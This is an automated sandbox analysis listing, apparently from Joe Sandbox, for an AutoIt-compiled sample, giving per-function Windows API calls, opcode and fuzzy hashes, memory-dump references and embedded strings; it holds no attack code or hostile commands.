                                              • Opcode ID: 778f72c1bdc08fd30a972768267d7069ca537684c8fcc3e66bad6457b94c3c6f
                                              • Instruction ID: a5634aead97ee2ef954cc44169316523324d44b96cc156f3abafe3029c068fbc
                                              • Opcode Fuzzy Hash: 778f72c1bdc08fd30a972768267d7069ca537684c8fcc3e66bad6457b94c3c6f
                                              • Instruction Fuzzy Hash: 64E04F7010421ABBEB149F19DC1AFBA7B94EB04751F408216F956DA2E1DA709850D760
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                              • CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: fd4a486cf92163d7fd0558925026936721683aca615791f54eae5ed89d899881
                                              • Instruction ID: 1b2a568df5a99674a2f5f99b3a4cf81dc90baa34e49930d4ffa182a4e62b1d93
                                              • Opcode Fuzzy Hash: fd4a486cf92163d7fd0558925026936721683aca615791f54eae5ed89d899881
                                              • Instruction Fuzzy Hash: 01E08631015911EFE7212B20EC04D73BBE9EF04310714C86EF46681430DB215C90DB10
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00BE4178,00B78D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00B7A15A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B7A163
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                              • Instruction ID: 2584ae5bdf913aa86908147b3c88ef632a6baba9f28e9309ba3ac1ee7ed2f7ef
                                              • Opcode Fuzzy Hash: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                              • Instruction Fuzzy Hash: 40B0923105920AABCA002B95EC19BA8BF68EB44AB2F418022F60E86060EF6254508A99
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 00B93E62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: e641d32cafeae5e66249e674018e452fbdab950b99b10176c13b24cfaf0709c3
                                              • Instruction ID: c73962270b3dc49f4fe5b9f3d542a5e30ff62e523e508ce6c5a4d4e2ab4b60e4
                                              • Opcode Fuzzy Hash: e641d32cafeae5e66249e674018e452fbdab950b99b10176c13b24cfaf0709c3
                                              • Instruction Fuzzy Hash: 54A24975A00205CBCB28CF54C480BAAB7F2FB59311F6480E9ED25AB351D775EE4ACB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                              • Instruction ID: 12f1c9f3d00c3ecbcc202e0f586698c30ad6fefdce1a41a01726d3ba3cc1bdd4
                                              • Opcode Fuzzy Hash: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                              • Instruction Fuzzy Hash: 2E320522D69F424DD7239634D872335A289AFB73C5F15D737F82ABA9A5EF28C4834104
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                              • Instruction ID: e325feccdce3a167206744b8a8a2a9410567002dec514bf02e9b0f681019771a
                                              • Opcode Fuzzy Hash: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                              • Instruction Fuzzy Hash: 26B10330D2AF804DD323A6398871336B69CAFBB2C5F52D71BFC1675D62EB2195834241
                                              APIs
                                              • __time64.LIBCMT ref: 00BB889B
                                                • Part of subcall function 00B7520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BB8F6E,00000000,?,?,?,?,00BB911F,00000000,?), ref: 00B75213
                                                • Part of subcall function 00B7520A: __aulldiv.LIBCMT ref: 00B75233
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID:
                                              • API String ID: 2893107130-0
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00BDD838
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              APIs
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00B8B952,?,?,?,?,00000000,?), ref: 00BDD432
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00B51B04,?,?,?,?,?), ref: 00B518E2
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00BDC8FE
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BB4C4A
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BA8389), ref: 00BA87D1
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B8B9BC,?,?,?,?,?,?), ref: 00BDC934
                                                • Part of subcall function 00BDB635: _memset.LIBCMT ref: 00BDB644
                                                • Part of subcall function 00BDB635: _memset.LIBCMT ref: 00BDB653
                                                • Part of subcall function 00BDB635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
                                                • Part of subcall function 00BDB635: CloseHandle.KERNEL32 ref: 00BDB694
                                              Similarity
                                              • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                              • String ID:
                                              • API String ID: 2364484715-0
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00B51AEE,?,?,?), ref: 00B516AB
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL ref: 00BDC8B4
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL ref: 00BDC885
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                • Part of subcall function 00B5201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
                                                • Part of subcall function 00B5201B: KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00B51AE2,?,?), ref: 00B516D4
                                              Similarity
                                              • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                              • String ID:
                                              • API String ID: 2797419724-0
                                              • Opcode ID: 58680f3d70494f5a162eafdf44b2d8cf834e9a8a742237d244c48e4b09dd6417
                                              • Instruction ID: 9023519871329960233a7a94a2e3865807d8c1212ca693d49d8148e911910be2
                                              • Opcode Fuzzy Hash: 58680f3d70494f5a162eafdf44b2d8cf834e9a8a742237d244c48e4b09dd6417
                                              • Instruction Fuzzy Hash: AFD01270142308B7DE113B50DC17F597A599B59751F408061BE05291D3CA716950A598
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B7A12A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                              • Instruction ID: be1d70e7357b9cf8852dec30238f5a4d460c744870e985a17fcbe6ab61f12366
                                              • Opcode Fuzzy Hash: cca3169ee5d9d4dcf72a566438e974aa8594e39b53ad91a64a7b93fc7464eb7d
                                              • Instruction Fuzzy Hash: 0AA0123000410DA7CA001B45EC04454BF5CD6001A07004021F40D410219B3254104584
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                              • Instruction ID: 9f2cf382c96c99471667ba67928557e91acd16141424dfc809957550e177d5ff
                                              • Opcode Fuzzy Hash: c446f53b08d84fa4e82cbb76f0c6b6d924838729dac22bc74d39ebd1cff9d299
                                              • Instruction Fuzzy Hash: 9E223730508606CBDF388AA4C4D477D77E1FF42344F2882EBDA569B592DB789E91CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 14973e1bfa812320dc693cb107ed92112594c00c3d681847bd641e9a48dd7f91
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: B0C185322051930ADF2D473D847503EFAE19EA27B131A87EDD8BBDB1D5EE20C965D620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 24dc4dfc989a72fb6be43480d7d6974a2022f7467a4fb9711f3c4bc231c4de30
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 73C185322051930ADF2D473EC47513EBAE19EA27B131A87EDD4BBDB1D5EE20C925D620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: c6b82ca1cf05a7471c543d14db86c40b50865be8e2ded7f27863ea2399583739
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: D8C1733220519309DF2D463D847513EBAE1DEA27B131A9BEDD4BBDB1C4EE20C965DA30
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BC785B
                                              • DeleteObject.GDI32(00000000), ref: 00BC786D
                                              • DestroyWindow.USER32 ref: 00BC787B
                                              • GetDesktopWindow.USER32 ref: 00BC7895
                                              • GetWindowRect.USER32(00000000), ref: 00BC789C
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BC79DD
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BC79ED
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A35
                                              • GetClientRect.USER32(00000000,?), ref: 00BC7A41
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC7A7B
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A9D
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AB0
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7ABB
                                              • GlobalLock.KERNEL32(00000000), ref: 00BC7AC4
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AD3
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00BC7ADC
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AE3
                                              • GlobalFree.KERNEL32(00000000), ref: 00BC7AEE
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00BC7B00
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BE2CAC,00000000), ref: 00BC7B16
                                              • GlobalFree.KERNEL32(00000000), ref: 00BC7B26
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BC7B4C
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BC7B6B
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B8D
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7D7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                              • Instruction ID: ba41fcd744fa0d64080f7f11bf7b8f0b048aa7b63ec934511768fd292f4f3774
                                              • Opcode Fuzzy Hash: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                              • Instruction Fuzzy Hash: 12026A71900115EFDB14DFA4CC99EAEBBB9FB49310F1481A9F916AB2A0DB709D01CF60
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,00BDF910), ref: 00BD3627
                                              • IsWindowVisible.USER32(?), ref: 00BD364B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: 69a163962d9a3f61504399de29301002fa954c1470f7930e8cdb53f57c711447
                                              • Instruction ID: 1203d0394c2abd8baa39a332a360c0a21b234d7abca3e99a4e9f54411ee93462
